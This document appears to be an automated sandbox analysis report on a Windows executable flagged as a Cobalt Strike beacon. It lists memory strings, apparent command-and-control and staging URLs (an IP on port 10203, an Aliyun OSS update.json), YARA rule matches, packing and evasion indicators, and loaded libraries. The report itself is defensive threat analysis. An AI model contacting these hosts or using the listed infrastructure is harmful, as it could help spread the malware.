Source: 31#U544a.exe, 00000000.00000003.1883833961.000001912B09D000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF
Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr
Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy
Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/dll
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/l
Source: 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/ll
Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/y
Source: 31#U544a.exe	String found in binary or memory: https://github.com/DosX-dev/UPX-Patcher
Source: 31#U544a.exe, 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json
Source: 31#U544a.exe, 00000000.00000003.1690727037.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 118.31.219.225:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown

Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7D39EB NtDeviceIoControlFile,RtlNtStatusToDosError,		0_2_00007FF71A7D39EB
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7D4165 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,CloseHandle,		0_2_00007FF71A7D4165

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A7D39EB: NtDeviceIoControlFile,RtlNtStatusToDosError,

0_2_00007FF71A7D39EB

Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A809BBB	0_2_00007FF71A809BBB
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A81FB52	0_2_00007FF71A81FB52
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A81173C	0_2_00007FF71A81173C
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A3611	0_2_00007FF71A7A3611
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7F0C67	0_2_00007FF71A7F0C67
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7E29FC	0_2_00007FF71A7E29FC
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7F8A58	0_2_00007FF71A7F8A58
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A820507	0_2_00007FF71A820507
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7EA451	0_2_00007FF71A7EA451
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80C1DD	0_2_00007FF71A80C1DD
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7E48D8	0_2_00007FF71A7E48D8
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A816696	0_2_00007FF71A816696
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A825BA0	0_2_00007FF71A825BA0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A82BBD0	0_2_00007FF71A82BBD0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A84DBF9	0_2_00007FF71A84DBF9
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A821B50	0_2_00007FF71A821B50
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A831B4F	0_2_00007FF71A831B4F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7F1C4A	0_2_00007FF71A7F1C4A
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8339B0	0_2_00007FF71A8339B0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A819A10	0_2_00007FF71A819A10
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A837990	0_2_00007FF71A837990
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7ABAD0	0_2_00007FF71A7ABAD0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A841AC0	0_2_00007FF71A841AC0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A855A4F	0_2_00007FF71A855A4F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8520B7	0_2_00007FF71A8520B7
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8460F0	0_2_00007FF71A8460F0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7B0080	0_2_00007FF71A7B0080
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A7DCC	0_2_00007FF71A7A7DCC
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A7E09	0_2_00007FF71A7A7E09
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A823D50	0_2_00007FF71A823D50
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A839EC0	0_2_00007FF71A839EC0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A1E71	0_2_00007FF71A7A1E71
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A73DB	0_2_00007FF71A7A73DB
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8313E0	0_2_00007FF71A8313E0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A841370	0_2_00007FF71A841370
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8274C0	0_2_00007FF71A8274C0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7D51C7	0_2_00007FF71A7D51C7
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7D52DF	0_2_00007FF71A7D52DF
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7C121E	0_2_00007FF71A7C121E
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7DB251	0_2_00007FF71A7DB251
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83B270	0_2_00007FF71A83B270
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A580B	0_2_00007FF71A7A580B
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7CF72A	0_2_00007FF71A7CF72A
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A976D	0_2_00007FF71A7A976D
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A7795	0_2_00007FF71A7A7795
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A839780	0_2_00007FF71A839780
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80381E	0_2_00007FF71A80381E
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A16A5	0_2_00007FF71A7A16A5
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7C9690	0_2_00007FF71A7C9690
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83EBC0	0_2_00007FF71A83EBC0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A84CBF5	0_2_00007FF71A84CBF5
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7B6B6A	0_2_00007FF71A7B6B6A
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83AB90	0_2_00007FF71A83AB90
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80CCE1	0_2_00007FF71A80CCE1
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83CD00	0_2_00007FF71A83CD00
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7B49B2	0_2_00007FF71A7B49B2
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7FE9F7	0_2_00007FF71A7FE9F7
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83AAC0	0_2_00007FF71A83AAC0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A826A60	0_2_00007FF71A826A60
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A847010	0_2_00007FF71A847010
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A830F30	0_2_00007FF71A830F30
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7B10F0	0_2_00007FF71A7B10F0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A85D0D9	0_2_00007FF71A85D0D9
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A839110	0_2_00007FF71A839110
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A835080	0_2_00007FF71A835080
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7FCDDE	0_2_00007FF71A7FCDDE
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7C6F11	0_2_00007FF71A7C6F11
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7A2E48	0_2_00007FF71A7A2E48
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A824E88	0_2_00007FF71A824E88
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80E336	0_2_00007FF71A80E336
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83E4F0	0_2_00007FF71A83E4F0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A82C1D0	0_2_00007FF71A82C1D0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7D01F2	0_2_00007FF71A7D01F2
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83020F	0_2_00007FF71A83020F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80E2AE	0_2_00007FF71A80E2AE
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A80E2CE	0_2_00007FF71A80E2CE
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A81C2C0	0_2_00007FF71A81C2C0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7BC220	0_2_00007FF71A7BC220
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A85677E	0_2_00007FF71A85677E
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A84E90B	0_2_00007FF71A84E90B
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8485C0	0_2_00007FF71A8485C0
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A7CE5E2	0_2_00007FF71A7CE5E2
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A84C570	0_2_00007FF71A84C570
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A842560	0_2_00007FF71A842560
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A844580	0_2_00007FF71A844580
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A810586	0_2_00007FF71A810586
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A83C630	0_2_00007FF71A83C630
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B78FA70	0_2_000001912B78FA70
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B79289C	0_2_000001912B79289C
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B787074	0_2_000001912B787074
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B791688	0_2_000001912B791688
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B791D4C	0_2_000001912B791D4C

Source: C:\Users\user\Desktop\31#U544a.exe	Code function: String function: 00007FF71A7AEF70 appears 51 times
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: String function: 00007FF71A7AC0C0 appears 62 times
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: String function: 00007FF71A7ADE90 appears 65 times
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: String function: 00007FF71A7AC510 appears 142 times

Source: 31#U544a.exe, 00000000.00000000.1649326774.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe
Source: 31#U544a.exe, 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe
Source: 31#U544a.exe	Binary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe

Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A823D50 memset,FormatMessageW,memcpy,GetLastError,

0_2_00007FF71A823D50

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A8460F0 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,RtlVirtualUnwind,

0_2_00007FF71A8460F0

Source: C:\Users\user\Desktop\31#U544a.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 31#U544a.exe	ReversingLabs: Detection: 13%
Source: 31#U544a.exe	Virustotal: Detection: 26%

Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 31#U544a.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 31#U544a.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\31#U544a.exe

Unpacked PE file: 0.2.31#U544a.exe.7ff71a7a0000.0.unpack .dosx:EW;.fish:EW;.rsrc:EW; vs .dosx:ER;.fish:ER;.rsrc:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .fish

Source: 31#U544a.exe	Static PE information: section name: .dosx
Source: 31#U544a.exe	Static PE information: section name: .fish

Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_3_000001912B274080 push ecx; iretd	0_3_000001912B274083
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_3_000001912B273EE4 push ecx; iretd	0_3_000001912B273EE7
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_3_000001912B273B6A push ecx; iretd	0_3_000001912B273B8F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_3_000001912B274050 push ecx; iretd	0_3_000001912B274053
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_3_000001912B27044E pushad ; iretd	0_3_000001912B27044F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B77935D push edi; iretd	0_2_000001912B77935E
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B79B158 push ebp; iretd	0_2_000001912B79B159
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B79B12F push ebp; iretd	0_2_000001912B79B130
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B77B91C pushad ; retf	0_2_000001912B77B91D
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B79B10F push ebp; iretd	0_2_000001912B79B110
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B77971E push cs; retf	0_2_000001912B77971F
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_000001912B77AD58 push ebp; iretd	0_2_000001912B77AD59

Source: 31#U544a.exe

Static PE information: section name: .fish entropy: 7.90743698825191

Source: C:\Users\user\Desktop\31#U544a.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A7A1D00 rdtsc

0_2_00007FF71A7A1D00

Source: C:\Users\user\Desktop\31#U544a.exe TID: 4488

Thread sleep time: -330000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\31#U544a.exe

Last function: Thread delayed

Source: 31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6BF000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2904739603.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
